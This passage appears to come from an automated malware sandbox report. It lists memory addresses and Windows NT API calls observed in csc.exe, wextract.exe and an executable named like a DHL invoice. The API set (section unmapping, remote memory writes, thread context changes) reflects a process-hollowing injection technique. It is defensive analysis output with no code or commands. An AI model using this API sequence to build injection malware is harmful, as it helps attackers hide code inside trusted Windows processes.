            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05784340 NtSetContextThread,4_2_05784340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782D30 NtUnmapViewOfSection,4_2_05782D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782D10 NtMapViewOfSection,4_2_05782D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782D00 NtSetInformationFile,4_2_05782D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782DD0 NtDelayExecution,4_2_05782DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782DB0 NtEnumerateKey,4_2_05782DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782C60 NtCreateKey,4_2_05782C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782C00 NtQueryInformationProcess,4_2_05782C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782CF0 NtOpenProcess,4_2_05782CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782CC0 NtQueryVirtualMemory,4_2_05782CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782CA0 NtQueryInformationToken,4_2_05782CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782F60 NtCreateProcessEx,4_2_05782F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782F30 NtCreateSection,4_2_05782F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782FE0 NtCreateFile,4_2_05782FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782FB0 NtResumeThread,4_2_05782FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782FA0 NtQuerySection,4_2_05782FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782F90 NtProtectVirtualMemory,4_2_05782F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782E30 NtWriteVirtualMemory,4_2_05782E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782EE0 NtQueueApcThread,4_2_05782EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782EA0 NtAdjustPrivilegesToken,4_2_05782EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782E80 NtReadVirtualMemory,4_2_05782E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782BF0 NtAllocateVirtualMemory,4_2_05782BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782BE0 NtQueryValueKey,4_2_05782BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782BA0 NtEnumerateValueKey,4_2_05782BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782B80 NtQueryInformationFile,4_2_05782B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782AF0 NtWriteFile,4_2_05782AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782AD0 NtReadFile,4_2_05782AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05782AB0 NtWaitForSingleObject,4_2_05782AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05783010 NtOpenDirectoryObject,4_2_05783010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05783090 NtSetValueKey,4_2_05783090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05783D70 NtOpenThread,4_2_05783D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05783D10 NtOpenProcessToken,4_2_05783D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057839B0 NtGetContextThread,4_2_057839B0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046035C0 NtCreateMutant,LdrInitializeThunk,13_2_046035C0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04604650 NtSuspendThread,LdrInitializeThunk,13_2_04604650
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04604340 NtSetContextThread,LdrInitializeThunk,13_2_04604340
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602C60 NtCreateKey,LdrInitializeThunk,13_2_04602C60
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04602C70
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_04602CA0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_04602D30
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602D10 NtMapViewOfSection,LdrInitializeThunk,13_2_04602D10
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_04602DF0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602DD0 NtDelayExecution,LdrInitializeThunk,13_2_04602DD0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602EE0 NtQueueApcThread,LdrInitializeThunk,13_2_04602EE0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_04602E80
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602F30 NtCreateSection,LdrInitializeThunk,13_2_04602F30
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602FE0 NtCreateFile,LdrInitializeThunk,13_2_04602FE0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602FB0 NtResumeThread,LdrInitializeThunk,13_2_04602FB0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046039B0 NtGetContextThread,LdrInitializeThunk,13_2_046039B0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602AF0 NtWriteFile,LdrInitializeThunk,13_2_04602AF0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602AD0 NtReadFile,LdrInitializeThunk,13_2_04602AD0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602B60 NtClose,LdrInitializeThunk,13_2_04602B60
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602BE0 NtQueryValueKey,LdrInitializeThunk,13_2_04602BE0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04602BF0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_04602BA0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04603010 NtOpenDirectoryObject,13_2_04603010
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04603090 NtSetValueKey,13_2_04603090
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602C00 NtQueryInformationProcess,13_2_04602C00
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602CF0 NtOpenProcess,13_2_04602CF0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602CC0 NtQueryVirtualMemory,13_2_04602CC0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04603D70 NtOpenThread,13_2_04603D70
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602D00 NtSetInformationFile,13_2_04602D00
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04603D10 NtOpenProcessToken,13_2_04603D10
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602DB0 NtEnumerateKey,13_2_04602DB0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602E30 NtWriteVirtualMemory,13_2_04602E30
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602EA0 NtAdjustPrivilegesToken,13_2_04602EA0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602F60 NtCreateProcessEx,13_2_04602F60
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602FA0 NtQuerySection,13_2_04602FA0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602F90 NtProtectVirtualMemory,13_2_04602F90
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602AB0 NtWaitForSingleObject,13_2_04602AB0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04602B80 NtQueryInformationFile,13_2_04602B80
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_00429030 NtDeleteFile,13_2_00429030
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_004290D0 NtClose,13_2_004290D0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_00429240 NtAllocateVirtualMemory,13_2_00429240
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_00428DD0 NtCreateFile,13_2_00428DD0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_00428F40 NtReadFile,13_2_00428F40
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EF8D0 NtMapViewOfSection,13_2_048EF8D0
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B892F6D0_2_00007FFD9B892F6D
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B8A368C0_2_00007FFD9B8A368C
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B892E800_2_00007FFD9B892E80
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B891D100_2_00007FFD9B891D10
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B8974700_2_00007FFD9B897470
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B89A8B90_2_00007FFD9B89A8B9
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B89D6C50_2_00007FFD9B89D6C5
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B9600500_2_00007FFD9B960050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004185C34_2_004185C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004100734_2_00410073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040E0F34_2_0040E0F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004011A04_2_004011A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00402A104_2_00402A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004033104_2_00403310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0042EC934_2_0042EC93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004026404_2_00402640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00402E404_2_00402E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040FE4A4_2_0040FE4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040FE534_2_0040FE53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00402E3D4_2_00402E3D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040263F4_2_0040263F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004167A34_2_004167A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058105914_2_05810591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057505354_2_05750535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FE4F64_2_057FE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058024464_2_05802446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057507704_2_05750770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057747504_2_05774750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574C7C04_2_0574C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576C6E04_2_0576C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D81584_2_057D8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058101AA4_2_058101AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058081CC4_2_058081CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057EA1184_2_057EA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057401004_2_05740100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E20004_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058103E64_2_058103E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F04_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580A3524_2_0580A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F02744_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D02C04_2_057D02C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD004_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE04_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768DBF4_2_05768DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C004_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740CF24_2_05740CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB54_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4F404_2_057C4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05770F304_2_05770F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05792F284_2_05792F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742FC84_2_05742FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057CEFA04_2_057CEFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580CE934_2_0580CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750E594_2_05750E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580EEDB4_2_0580EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580EE264_2_0580EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05762E904_2_05762E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057669624_2_05766962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0581A9A64_2_0581A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057529A04_2_057529A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057528404_2_05752840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575A8404_2_0575A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E8F04_2_0577E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057368B84_2_057368B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05806BD74_2_05806BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580AB404_2_0580AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574EA804_2_0574EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057ED5B04_2_057ED5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058075714_2_05807571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057414604_2_05741460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580F43F4_2_0580F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580F7B04_2_0580F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058016CC4_2_058016CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573F1724_2_0573F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578516C4_2_0578516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575B1B04_2_0575B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0581B16B4_2_0581B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580F0E04_2_0580F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058070E94_2_058070E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FF0CC4_2_057FF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057570C04_2_057570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573D34C4_2_0573D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580132D4_2_0580132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0579739A4_2_0579739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576D2F04_2_0576D2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F12ED4_2_057F12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576B2C04_2_0576B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057552A04_2_057552A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05753D404_2_05753D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576FDC04_2_0576FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05801D5A4_2_05801D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05807D734_2_05807D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C9C324_2_057C9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580FCF24_2_0580FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580FFB14_2_0580FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580FF094_2_0580FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05751F924_2_05751F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05759EB04_2_05759EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057599504_2_05759950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576B9504_2_0576B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BD8004_2_057BD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057538E04_2_057538E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0578DBF94_2_0578DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C5BF04_2_057C5BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580FB764_2_0580FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576FB804_2_0576FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C3A6C4_2_057C3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FDAC64_2_057FDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05807A464_2_05807A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580FA494_2_0580FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057EDAAC4_2_057EDAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05795AA04_2_05795AA0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468244613_2_04682446
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045C146013_2_045C1460
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468F43F13_2_0468F43F
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0467E4F613_2_0467E4F6
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468757113_2_04687571
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D053513_2_045D0535
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0466D5B013_2_0466D5B0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0469059113_2_04690591
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046816CC13_2_046816CC
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045EC6E013_2_045EC6E0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045F475013_2_045F4750
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D077013_2_045D0770
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045CC7C013_2_045CC7C0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468F7B013_2_0468F7B0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046870E913_2_046870E9
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468F0E013_2_0468F0E0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D70C013_2_045D70C0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0467F0CC13_2_0467F0CC
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0469B16B13_2_0469B16B
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0460516C13_2_0460516C
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045BF17213_2_045BF172
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0465815813_2_04658158
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045C010013_2_045C0100
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0466A11813_2_0466A118
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046881CC13_2_046881CC
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046901AA13_2_046901AA
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045DB1B013_2_045DB1B0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0467027413_2_04670274
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046712ED13_2_046712ED
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045EB2C013_2_045EB2C0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045ED2F013_2_045ED2F0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D52A013_2_045D52A0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045BD34C13_2_045BD34C
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468A35213_2_0468A352
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468132D13_2_0468132D
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_046903E613_2_046903E6
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045DE3F013_2_045DE3F0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0461739A13_2_0461739A
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04649C3213_2_04649C32
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D0C0013_2_045D0C00
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468FCF213_2_0468FCF2
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045C0CF213_2_045C0CF2
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04670CB513_2_04670CB5
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04687D7313_2_04687D73
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D3D4013_2_045D3D40
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04681D5A13_2_04681D5A
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045DAD0013_2_045DAD00
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045EFDC013_2_045EFDC0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045CADE013_2_045CADE0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045E8DBF13_2_045E8DBF
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D0E5913_2_045D0E59
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468EE2613_2_0468EE26
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468EEDB13_2_0468EEDB
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045E2E9013_2_045E2E90
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D9EB013_2_045D9EB0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468CE9313_2_0468CE93
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04644F4013_2_04644F40
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04612F2813_2_04612F28
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468FF0913_2_0468FF09
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045F0F3013_2_045F0F30
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045C2FC813_2_045C2FC8
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0464EFA013_2_0464EFA0
